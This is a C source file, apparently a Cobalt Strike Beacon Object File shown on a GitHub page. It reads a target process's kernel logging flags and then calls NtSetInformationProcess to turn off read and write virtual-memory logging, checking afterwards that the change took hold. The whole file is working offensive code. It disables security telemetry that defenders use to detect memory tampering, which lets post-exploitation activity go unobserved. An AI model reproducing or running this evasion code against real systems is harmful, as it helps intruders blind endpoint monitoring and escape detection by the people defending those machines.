-
Notifications
You must be signed in to change notification settings - Fork 2
/
entry.c
110 lines (88 loc) · 4.03 KB
/
entry.c
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
#include <windows.h>
#include <processthreadsapi.h>
#include "beacon.h"
#include "bofdefs.h"
DECLSPEC_IMPORT NTSTATUS WINAPI NTDLL$NtQueryInformationProcess(HANDLE, PROCESSINFOCLASS, PVOID, ULONG, PULONG);
DECLSPEC_IMPORT NTSTATUS WINAPI NTDLL$NtSetInformationProcess(HANDLE, PROCESSINFOCLASS, PVOID, ULONG);
#define ProcessEnableReadWriteVmLogging ((PROCESSINFOCLASS)0x57)
#define ProcessEnableLogging ((PROCESSINFOCLASS)0x60)
typedef union _PROCESS_READWRITEVM_LOGGING_INFORMATION {
UINT8 Flags;
struct {
UINT8 EnableReadVmLogging : 1;
UINT8 EnableWriteVmLogging : 1;
UINT8 Unused : 6;
};
} PROCESS_READWRITEVM_LOGGING_INFORMATION, * PPROCESS_READWRITEVM_LOGGING_INFORMATION;
typedef union _PROCESS_LOGGING_INFORMATION
{
ULONG Flags;
struct
{
ULONG EnableReadVmLogging : 1;
ULONG EnableWriteVmLogging : 1;
ULONG EnableProcessSuspendResumeLogging : 1;
ULONG EnableThreadSuspendResumeLogging : 1;
ULONG EnableLocalExecProtectVmLogging : 1;
ULONG EnableRemoteExecProtectVmLogging : 1;
ULONG Reserved : 26;
};
} PROCESS_LOGGING_INFORMATION, *PPROCESS_LOGGING_INFORMATION;
VOID psloginfo(DWORD pid) {
HANDLE pHandle = KERNEL32$OpenProcess(0x0400, FALSE, pid);
if (pHandle == NULL) {
BeaconPrintf(0, "psloginfo: openprocess 0x0400 err: %d\n", KERNEL32$GetLastError());
return;
}
PROCESS_LOGGING_INFORMATION plog;
PROCESS_READWRITEVM_LOGGING_INFORMATION prwlog;
ULONG outb;
NTDLL$NtQueryInformationProcess(pHandle, ProcessEnableReadWriteVmLogging, &prwlog, sizeof(PROCESS_READWRITEVM_LOGGING_INFORMATION), &outb);
BeaconPrintf(0, "psloginfo: prwlog: readvm %d, writevm %d\n", prwlog.EnableReadVmLogging, prwlog.EnableWriteVmLogging);
NTDLL$NtQueryInformationProcess(pHandle, ProcessEnableLogging, &plog, sizeof(PROCESS_LOGGING_INFORMATION), &outb);
BeaconPrintf(0, "psloginfo: plog: readvm %d, writevm %d\n\tpsuspend %d, tsuspend %d\n\tlxprotect %d, rxprotect %d\n",
plog.EnableReadVmLogging,
plog.EnableWriteVmLogging,
plog.EnableProcessSuspendResumeLogging,
plog.EnableThreadSuspendResumeLogging,
plog.EnableLocalExecProtectVmLogging,
plog.EnableRemoteExecProtectVmLogging);
KERNEL32$CloseHandle(pHandle);
pHandle = KERNEL32$OpenProcess(0x0200, FALSE, pid);
if (pHandle == NULL) {
BeaconPrintf(0, "psloginfo: openprocess 0x0200 err: %d\n", KERNEL32$GetLastError());
return;
}
prwlog.EnableReadVmLogging = 0;
prwlog.EnableWriteVmLogging = 0;
NTDLL$NtSetInformationProcess(pHandle, ProcessEnableReadWriteVmLogging, &prwlog, sizeof(PROCESS_READWRITEVM_LOGGING_INFORMATION));
KERNEL32$CloseHandle(pHandle);
pHandle = KERNEL32$OpenProcess(0x0400, FALSE, pid);
if (pHandle == NULL) {
BeaconPrintf(0, "psloginfo (after adjusting): openprocess 0x0400 err: %d\n", KERNEL32$GetLastError());
return;
}
NTDLL$NtQueryInformationProcess(pHandle, ProcessEnableReadWriteVmLogging, &prwlog, sizeof(PROCESS_READWRITEVM_LOGGING_INFORMATION), &outb);
BeaconPrintf(0, "psloginfo (after adjusting): prwlog: readvm %d, writevm %d\n", prwlog.EnableReadVmLogging, prwlog.EnableWriteVmLogging);
NTDLL$NtQueryInformationProcess(pHandle, ProcessEnableLogging, &plog, sizeof(PROCESS_LOGGING_INFORMATION), &outb);
BeaconPrintf(0, "psloginfo (after adjusting): plog: readvm %d, writevm %d\n\tpsuspend %d, tsuspend %d\n\tlxprotect %d, rxprotect %d\n",
plog.EnableReadVmLogging,
plog.EnableWriteVmLogging,
plog.EnableProcessSuspendResumeLogging,
plog.EnableThreadSuspendResumeLogging,
plog.EnableLocalExecProtectVmLogging,
plog.EnableRemoteExecProtectVmLogging);
KERNEL32$CloseHandle(pHandle);
}
VOID go(
IN PCHAR Buffer,
IN ULONG Length
)
{
datap parser = {0};
BeaconDataParse(&parser, Buffer, Length);
DWORD pid = (DWORD)BeaconDataInt(&parser);
if (pid == 0)
pid = KERNEL32$GetCurrentProcessId();
psloginfo(pid);
};